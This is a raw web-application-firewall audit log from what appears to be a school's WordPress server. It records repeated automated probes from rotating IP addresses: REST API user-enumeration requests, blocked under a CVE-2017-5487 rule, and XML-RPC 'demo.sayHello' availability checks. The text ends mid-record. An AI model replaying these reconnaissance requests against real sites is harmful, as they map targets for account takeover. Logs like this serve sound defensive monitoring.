Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ede29010-Z-- --712a8266-A-- [10/May/2025:01:16:59 +0700] aB5Gm1qQ1nOVx9fWpZSx1gAAABQ 103.236.140.4 58928 103.236.140.4 8181 --712a8266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --712a8266-C-- demo.sayHello --712a8266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --712a8266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814619248056 6251 (- - -) Stopwatch2: 1746814619248056 6251; combined=4576, p1=605, p2=3690, p3=35, p4=38, p5=124, sr=77, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --712a8266-Z-- --09529911-A-- [10/May/2025:01:17:40 +0700] aB5GxFqQ1nOVx9fWpZSx2QAAABc 103.236.140.4 58936 103.236.140.4 8181 --09529911-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09529911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09529911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814660724874 3049 (- - -) Stopwatch2: 1746814660724874 3049; combined=1364, p1=457, p2=875, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09529911-Z-- --1f0b935e-A-- [10/May/2025:01:17:47 +0700] aB5Gy1qQ1nOVx9fWpZSx2gAAAAM 103.236.140.4 58940 103.236.140.4 8181 --1f0b935e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f0b935e-C-- demo.sayHello --1f0b935e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f0b935e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814667067038 5502 (- - -) Stopwatch2: 1746814667067038 5502; combined=4100, p1=557, p2=3312, p3=29, p4=32, p5=100, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f0b935e-Z-- --63f37300-A-- [10/May/2025:01:17:49 +0700] aB5GzVqQ1nOVx9fWpZSx2wAAABY 103.236.140.4 58942 103.236.140.4 8181 --63f37300-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63f37300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63f37300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814669060711 2038 (- - -) Stopwatch2: 1746814669060711 2038; combined=995, p1=342, p2=626, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63f37300-Z-- --ab74f85e-A-- [10/May/2025:01:17:54 +0700] aB5G0i-fAO47ojYKsMr6TgAAAE0 103.236.140.4 58948 103.236.140.4 8181 --ab74f85e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab74f85e-C-- demo.sayHello --ab74f85e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab74f85e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814674754992 4730 (- - -) Stopwatch2: 1746814674754992 4730; combined=3713, p1=455, p2=3063, p3=21, p4=24, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab74f85e-Z-- --c346e452-A-- [10/May/2025:01:18:10 +0700] aB5G4loC-7ITMWTA_c9fmQAAANg 103.236.140.4 58952 103.236.140.4 8181 --c346e452-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c346e452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c346e452-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814690727089 3399 (- - -) Stopwatch2: 1746814690727089 3399; combined=1484, p1=500, p2=943, p3=0, p4=0, p5=40, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c346e452-Z-- --87250b4e-A-- [10/May/2025:01:18:15 +0700] aB5G5y-fAO47ojYKsMr6UQAAAFc 103.236.140.4 58956 103.236.140.4 8181 --87250b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87250b4e-C-- demo.sayHello --87250b4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87250b4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814695060351 4805 (- - -) Stopwatch2: 1746814695060351 4805; combined=3754, p1=454, p2=3086, p3=28, p4=33, p5=90, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87250b4e-Z-- --1b948924-A-- [10/May/2025:01:19:03 +0700] aB5HFy-fAO47ojYKsMr6VwAAAFI 103.236.140.4 58972 103.236.140.4 8181 --1b948924-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b948924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b948924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814743026716 2962 (- - -) Stopwatch2: 1746814743026716 2962; combined=1286, p1=462, p2=794, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b948924-Z-- --9f553805-A-- [10/May/2025:01:19:06 +0700] aB5HGi-fAO47ojYKsMr6WQAAAEY 103.236.140.4 58976 103.236.140.4 8181 --9f553805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9f553805-C-- demo.sayHello --9f553805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f553805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814746975905 4688 (- - -) Stopwatch2: 1746814746975905 4688; combined=3765, p1=475, p2=2975, p3=23, p4=24, p5=147, sr=67, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f553805-Z-- --c0251a1d-A-- [10/May/2025:01:19:10 +0700] aB5HHi-fAO47ojYKsMr6WwAAAE4 103.236.140.4 58980 103.236.140.4 8181 --c0251a1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0251a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0251a1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814750533114 2150 (- - -) Stopwatch2: 1746814750533114 2150; combined=1089, p1=357, p2=705, p3=0, p4=0, p5=26, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0251a1d-Z-- --cc78ae5a-A-- [10/May/2025:01:19:15 +0700] aB5HIy-fAO47ojYKsMr6XQAAAE0 103.236.140.4 58984 103.236.140.4 8181 --cc78ae5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc78ae5a-C-- demo.sayHello --cc78ae5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc78ae5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814755589518 6282 (- - -) Stopwatch2: 1746814755589518 6282; combined=4580, p1=588, p2=3699, p3=94, p4=44, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc78ae5a-Z-- --4011ef43-A-- [10/May/2025:01:20:07 +0700] aB5HVy-fAO47ojYKsMr6XwAAAFg 103.236.140.4 58988 103.236.140.4 8181 --4011ef43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4011ef43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4011ef43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814807612098 3004 (- - -) Stopwatch2: 1746814807612098 3004; combined=1342, p1=490, p2=822, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4011ef43-Z-- --8f61794c-A-- [10/May/2025:01:20:12 +0700] aB5HXC-fAO47ojYKsMr6YQAAAEA 103.236.140.4 58992 103.236.140.4 8181 --8f61794c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f61794c-C-- demo.sayHello --8f61794c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f61794c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814812925089 16875 (- - -) Stopwatch2: 1746814812925089 16875; combined=27986, p1=463, p2=3190, p3=29, p4=34, p5=12148, sr=86, sw=69, l=0, gc=12053 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f61794c-Z-- --72210d4d-A-- [10/May/2025:01:21:22 +0700] aB5HolqQ1nOVx9fWpZSx3QAAAAo 103.236.140.4 58996 103.236.140.4 8181 --72210d4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72210d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72210d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814882179540 3211 (- - -) Stopwatch2: 1746814882179540 3211; combined=1370, p1=464, p2=874, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72210d4d-Z-- --51c8590a-A-- [10/May/2025:01:21:28 +0700] aB5HqC-fAO47ojYKsMr6ZAAAAEI 103.236.140.4 59004 103.236.140.4 8181 --51c8590a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51c8590a-C-- demo.sayHello --51c8590a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51c8590a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814888589940 5578 (- - -) Stopwatch2: 1746814888589940 5578; combined=4204, p1=544, p2=3418, p3=34, p4=33, p5=102, sr=90, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51c8590a-Z-- --a963a941-A-- [10/May/2025:01:50:43 +0700] aB5Ogx6q_ZMebht3q14lRAAAAIw 103.236.140.4 59180 103.236.140.4 8181 --a963a941-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.77.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.77.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a963a941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a963a941-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816643047495 2933 (- - -) Stopwatch2: 1746816643047495 2933; combined=1301, p1=448, p2=822, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a963a941-Z-- --f1604d43-A-- [10/May/2025:01:54:44 +0700] aB5PdB6q_ZMebht3q14lSwAAAII 103.236.140.4 59202 103.236.140.4 8181 --f1604d43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.73.133.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.73.133.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f1604d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1604d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 